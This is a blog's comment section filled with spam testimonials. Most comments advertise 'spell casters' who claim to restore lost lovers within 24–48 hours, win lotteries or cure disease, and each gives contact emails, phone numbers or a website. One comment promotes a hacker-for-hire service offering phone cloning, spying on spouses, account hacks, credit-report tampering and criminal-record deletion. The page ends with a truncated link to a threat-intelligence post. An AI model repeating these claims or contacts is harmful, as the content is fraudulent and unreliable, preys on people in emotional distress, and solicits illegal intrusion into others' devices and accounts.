  17. Hello everyone. I want to share my amazing experience with the great spell caster Dr.Ogudugu my husband was cheating on me and when I found out we had a fight which lead him filling for a divorce I cried and fell sick when I was searching about love quotes online I saw people talking about Dr.Ogudugu and his great work whose case was similar to mine they left his contact info I contacted Dr.Ogudugu and he told me not to worry that after 24 hours he will cancel the divorce and my husband will be back to me after I did everything he asked me to do to my greatest surprise the next day evening it was my husband he knelt down begging me to accept him back, thank you once again Dr.Ogudugu you are indeed a blessing to me he can also help you. Contact Dr.Ogudugu through his email address on: [email protected]

    ReplyDelete
  18. Hello everyone. I want to share my amazing experience with the great spell caster Dr.Ogudugu my husband was cheating on me and when I found out we had a fight which lead him filling for a divorce I cried and fell sick when I was searching about love quotes online I saw people talking about Dr.Ogudugu and his great work whose case was similar to mine they left his contact info I contacted Dr.Ogudugu and he told me not to worry that after 24 hours he will cancel the divorce and my husband will be back to me after I did everything he asked me to do to my greatest surprise the next day evening it was my husband he knelt down begging me to accept him back, thank you once again Dr.Ogudugu you are indeed a blessing to me he can also help you. Contact Dr.Ogudugu through his email address on: [email protected]

    ReplyDelete
  19. i want to share a wonderful testimony to the general public on how my relationship was restored back by a great powerful Dre called Dr odoman after three months of loneliness, my ex-lover called me after my contact with Dr odoman that he want us to come back and start a good home, now we are happily together again as lover. I will keep sharing this until people who also need help see this for his wonderful help. You can contact him on whatsapp [+2348025615207]  1) Love Spells 2) Lost Love Spells 3) Divorce Spells 4) Marriage Spells 5) Binding Spell. 6) Breakup Spells 7) Banish a past Lover 8.) You want to be promoted in your office/ Lottery spell 9) want to satisfy your lover 10,money spell       Contact this great man if you are having any problem for a lasting solution. 

    ReplyDelete
  20. Hello my name is Susan from USA i want to share an amazing experience i had with the almighty Priest Ade, my husband Greg filed for a divorce i was really devastated i cried day and night everyday i told a friend of mine about the situation and she told me about the powerful spell caster Priest Ade i was feeling a little bit skeptical about it but i just decided to give him a try i did everything he asked me to do and he promised me 24hrs result and the next morning to my greatest surprise it was Greg on his kneels begging me to forgive and accept him back i'm so happy all thanks to Priest Ade he can also help you contact  [email protected] OR [email protected] https://ancientspiritspell.wordpress.com WhatsApp +2347059715465 . 

    ReplyDelete
  21. Hello my name is Susan from USA i want to share an amazing experience i had with the almighty Priest Ade, my husband Greg filed for a divorce i was really devastated i cried day and night everyday i told a friend of mine about the situation and she told me about the powerful spell caster Priest Ade i was feeling a little bit skeptical about it but i just decided to give him a try i did everything he asked me to do and he promised me 24hrs result and the next morning to my greatest surprise it was Greg on his kneels begging me to forgive and accept him back i'm so happy all thanks to Priest Ade he can also help you contact  [email protected] OR ancientspiritspellca[email protected] https://ancientspiritspell.wordpress.com WhatsApp +2347059715465 . 

    ReplyDelete
  22. Breakup is painful, sometimes we pretend to be fine but we are not, fighting to get the one we love back is also fighting to get back our joy and happiness. After my boyfriend of one year broke up with me, I could barely speak without crying. I felt blindsided and didn't know what to do. I didn't know if I could get him back and the anxiety was unbearable. I scoured the internet and after reading countless articles and websites about spells, I came across Lord Zakuza SIGNAL MESSENGER number + 1 (740) 573-9483. I wanted our relationship back and Lord Zakuza guaranteed me that my boyfriend will come back to me. So, I followed the instructions & plans that Lord Zakuza laid out for me and within 48 hours, we were back together and so in love! I know that it doesn't always happen that quickly, but Lord Zakuza said he's spells are effective and it did! I'm so grateful and I can boldly say that if you have been broken up with and you want to get that person back, Get in touch with him for Lord Zakuza is a GOD on Earth and he also specialises on spells to get pregnant for your partner, to get cured from any sickness or diseases, to win a lottery E.T.C. I'll never forget how he helped me. Email him now via: [email protected]

    ReplyDelete
  23. infidelity in marriage is never a thing of joy, i was battling with infections in marriage , painful right. i'm not so ashamed to say this because i'll like this to serve as an eye opener to other young couples out there. my ex-husband was a university lecturer and was always involved with extra marital affairs. i found my self in and out of hospitals treating myself of STDs , i had to get an ethical hacker in QUADHACKED{@}GMAIL dot COM, to help me clone his phone and social media platforms in Whatsapp and Facebook messenger . i was able to gather several proofs from the the hack he was able to help me with. i'm so thankful and appreciative. he makes me feel invincible going into any relationship now . knowing fully well i'll be sure of my spouses intention. reach them through there email describing your hack needs and exploits .
    ALSO, if you are in need of a legit hacker for DELETING OF BLEMISHES FROM CREDIT REPORT
    CREDIT SCORE INCREASE
    PHONE CLONE PHONE TAP, SPY
    HACK YOUR CHEATING SPOUSE TO FIND OUT WHAT THEY BEEN UP TO MORTGAGE LOAN LENDERS AND APPROVALS .
    EMAIL HACKS
    WHATSAPP, MESSENGER AND OTHER SOCIAL MEDIA APP
    DELETING OF CRIMINAL RECORD AND EVICTION HISTORY
    send a descriptive message to [email protected]

    ReplyDelete

The Gh0st Remains the Same

Author:  Danny Adamitis   Executive Summary  Prevailion’s Tailored Intelligence Team has detected a new advanced campaign dubbed - “...